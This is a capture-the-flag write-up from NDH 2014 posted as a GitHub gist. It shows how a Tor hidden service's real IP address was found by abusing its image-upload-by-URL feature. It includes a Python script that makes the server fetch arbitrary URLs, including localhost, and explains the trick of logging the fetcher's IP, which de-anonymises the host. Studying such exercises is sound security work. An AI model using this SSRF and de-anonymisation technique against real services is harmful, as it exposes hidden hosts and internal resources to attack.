Skip to content

Instantly share code, notes, and snippets.

@Sliim

Sliim/Onion-Rings.writeup.org

Last active August 29, 2015 13:58
Show Gist options
  • Save Sliim/10011725 to your computer and use it in GitHub Desktop.
Save Sliim/10011725 to your computer and use it in GitHub Desktop.
Download ZIP
Onion Rings Writeup - NDH 2014 Prequals
Raw
Onion-Rings.writeup.org

Onion Rings Writeup - NDH 2014 Prequals

A new black market has appeared and has been targeted by the FBI.
After checking for suspicious posts on stackoverflow and finding
nothing, they give up and are offering a bounty to anyone who can
get information on the server that is hosting the hidden service.

Link    http://mq72g4732yorslzf.onion/

Ok the server is on an .onion domain! Let’s go, setting up tor project and connect to the hidden service, the Black Market! First, we discover the home page of this market, containing useful things :D.

http://sliim-projects.eu/writeup/ndh2k14-black-market/01-home.png

There is a button at the top right of the home page, this button point to an upload page http://mq72g4732yorslzf.onion/upload.php. User have the choice to upload an image from his computer, or specifying an url to the image.

Ok, validate the form with this url: http://3l1t3h4x0r.com/haxor.gif http://sliim-projects.eu/writeup/ndh2k14-black-market/02-upload.png

After form submitted, we are redirect to the same page upload.php and the image is displayed at the bottom of the page.

http://sliim-projects.eu/writeup/ndh2k14-black-market/03-uploaded.png

Ok, so where is stored uploaded image ? Take a look to the html source:

<img src="data:image/gif;base64,R0lGODlhpQ[...]MKAIRAAA7"/>

We can see at the end of html source that the image isn’t stored but displayed as base64 data. Ok, there is something here :). I therefore write a little script to upload and read base64 data:

""" Usage:
This script must be run in tor proxy to access onion target!
It take 1 argument, that is the url where will be uploaded image and print HTTP response

$ proxychains python upload-black-market.py "http://127.0.0.1/flag.txt"
"""

import sys, re, base64
import httplib, urllib

data = urllib.urlencode({"url": sys.argv[1], "upload": "Upload"})
h = httplib.HTTPConnection('mq72g4732yorslzf.onion:80')

headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}

h.request('POST', '/upload.php', data, headers)
r = h.getresponse()

b64 = re.search("(?<=base64,)(.*)\"", r.read()).group(1)

print b64
print base64.b64decode(b64)

After multiple attempt to find something interesting, an other member of my team help me..

  • Hey, and if you give an url to your serv you can get the IP of the fetcher..
  • Oh yeah: Why I have not thought earlier!!

So:

$ proxychains python upload-black-market.py "http://myserv.com/black-market"

And in my logs:

212.83.153.197 - - [05/Apr/2014:18:20:48 +0200] "GET /black-market HTTP/1.1" 403 439 "-" "-"

Thanks jpic!! :)

We can found the flag at http://212.83.153.197

He started screaming at me saying weird shit I didn’t understand, then he just lookde blank
and mumbled: “The flag .. The flag.. It is ’0hSh1t1r4n0ut0fn00dl35′. And then he just died in
front of me.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment